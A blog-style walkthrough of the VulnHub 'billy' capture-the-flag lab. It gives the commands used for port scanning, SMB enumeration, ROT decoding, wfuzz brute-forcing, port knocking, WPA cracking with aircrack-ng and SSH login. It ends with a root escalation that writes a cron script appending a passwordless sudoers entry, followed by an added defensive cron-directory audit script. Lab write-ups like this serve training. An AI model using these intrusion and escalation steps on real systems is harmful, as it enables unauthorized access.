Penetration Testing Series: VulnHub billy

I have to say this CTF is wildly imaginative. I am linking the tutorial directly; I learned a lot from it.

Tutorial

I. Kali tools
arp-scan
masscan
nmap
nikto
nc
firefox
burp suite
wireshark
exiftool
ncrack
aircrack-ng
truecrack
veracrypt
II. Steps
1. arp-scan -l
2. nmap -A -p1-65535 ip
3. masscan -p1-65535 ip --rate 10000
(very fast)
Discovered open port 23/tcp on 192.168.244.151
Discovered open port 2525/tcp on 192.168.244.151
Discovered open port 22/tcp on 192.168.244.151
Discovered open port 139/tcp on 192.168.244.151
Discovered open port 445/tcp on 192.168.244.151
Discovered open port 80/tcp on 192.168.244.151
Discovered open port 69/tcp on 192.168.244.151
4.
nmap -v --script smb-enum-shares.nse -p445 192.168.244.151
Path: C:\home\WeaselLaugh
| Anonymous access: READ/WRITE
smbclient \\\\10.1.1.129\\EricsSecretStuff\\
ls
get ebd.txt
Erics backdoor is currently CLOSED
5.
nmap shows this on port 23:
23/tcp open telnet?
| fingerprint-strings:
| NULL:
|_ ***** HAHAH! You're banned for a while, Billy Boy! By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****
The key sentence: I don't use ROTten passwords like rkfpuzrahngvat anymore
6.
rot-10 ... the password rkfpuzrahngvat looks like a ROT cipher with an unknown shift, so the script below prints every shift:

#!/usr/bin/env python3
# Print all 26 Caesar/ROT shifts of the word given on the command line
import string
import sys

lower = string.ascii_lowercase
for n in range(26):
    # shift the lowercase alphabet by n positions and apply it to the input
    table = str.maketrans(lower, lower[n:] + lower[:n])
    print(sys.argv[1].translate(table))

python3 rot-10.py "rkfpuzrahngvat" >> rot-10.txt
7. wfuzz
Then use wfuzz with the 26 candidates as the wordlist:
wfuzz -c --hc=404 -z file,rot-10.txt http://192.168.244.151/FUZZ
wfuzz finds: exschmenuating
8.
Visit http://ip/exschmenuating
which includes veronica from the famous wordlist file rockyou.txt.
(the rockyou.txt wordlist)
9. Since veronica is part of the password:
grep 'veronica' /usr/share/wordlists/rockyou.txt > pass.lst
wfuzz -c --hc=404 -z file,pass.lst http://192.168.244.151/exschmenuating/FUZZ.cap
This gives 3 hits, 2 of them malformed, so go straight to http://192.168.244.151/exschmenuating/012987veronica.cap
10.
After downloading the cap file, change its extension to txt. It contains:
Eric,
Thanks for your message. I tried to download that file but my antivirus blocked it.
Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo.
https://www.youtube.com/watch?v=z5YU7JwVy7s (I cannot reach YouTube; I was following the author's tutorial anyway, which says something about a port order...)
11. Port order: knock the sequence to open port 21
for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.244.151; done
12.
The cap file also contains:
Veronica,
Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."
-Eric
That gives us the credentials.
13. After the FTP connection, further operations follow.
Connect with ftp:
ftp ip
username of "eric" and password "ericdoesntdrinkhisownpee."
...
... (I could not get ftp to connect from Windows, so this part is not done yet)
14.
aircrack-ng -w /usr/share/wordlists/rockyou.txt eg-01.cap
KEY FOUND! [ triscuit* ]
ssh eric@10.1.1.129 -p 1974
15.
find / -perm -g=s -perm -u=s -type f -ls 2>/dev/null

  1454477    368 -r-sr-s---   1 root     eric       372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
  1058032     52 -rwsr-sr-x   1 daemon   daemon      51464 Jan 14  2016 /usr/bin/at

Inspecting the target program /usr/local/share/sgml/donpcgd:
/usr/local/share/sgml/donpcgd /etc/shadow /tmp/shadow
16.

eric@BM:~$ touch /tmp/rootme
eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/rootme /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/rootme,81b4,0)
eric@BM:~$ echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/rootme
eric@BM:~$ chmod +x /etc/cron.hourly/rootme
eric@BM:~$ cat /etc/cron.hourly/rootme
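The escalation above works only because an unprivileged user ends up with a file of his own in /etc/cron.hourly. As an added example (not part of the original walkthrough or the tutorial it follows), the script below audits a cron drop-in directory for exactly that condition: entries not owned by root, group- or world-writable, symlinks, or carrying setuid/setgid bits. The `expected_uid` parameter and the `audit_cron_dir` name are my own choices so the check can be exercised on a scratch directory.

```python
#!/usr/bin/env python3
"""Audit a cron drop-in directory (e.g. /etc/cron.hourly) for entries that an
ordinary user could have created or modified.  Added example, not from the
original walkthrough.  Assumption: every entry should be a plain file owned by
expected_uid (0 = root) and writable only by its owner."""
import os
import stat
import sys


def audit_cron_dir(path, expected_uid=0):
    """Return a sorted list of (filename, reason) tuples for suspicious entries."""
    findings = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        st = os.lstat(full)          # lstat: do not follow symlinks
        mode = st.st_mode
        if stat.S_ISLNK(mode):
            # a symlink here can point at any script the user controls
            findings.append((name, "symlink"))
            continue
        if not stat.S_ISREG(mode):
            findings.append((name, "not a regular file"))
            continue
        if st.st_uid != expected_uid:
            findings.append((name, "owner uid %d != %d" % (st.st_uid, expected_uid)))
        if mode & stat.S_IWGRP:
            findings.append((name, "group-writable"))
        if mode & stat.S_IWOTH:
            findings.append((name, "world-writable"))
        if mode & (stat.S_ISUID | stat.S_ISGID):
            findings.append((name, "setuid/setgid bit set"))
    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/cron.hourly"
    for fname, reason in audit_cron_dir(target):
        print("%s/%s: %s" % (target, fname, reason))
```

Run as root against /etc/cron.hourly, /etc/cron.daily and the other drop-in directories; a clean system returns no findings.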

2018.7.18
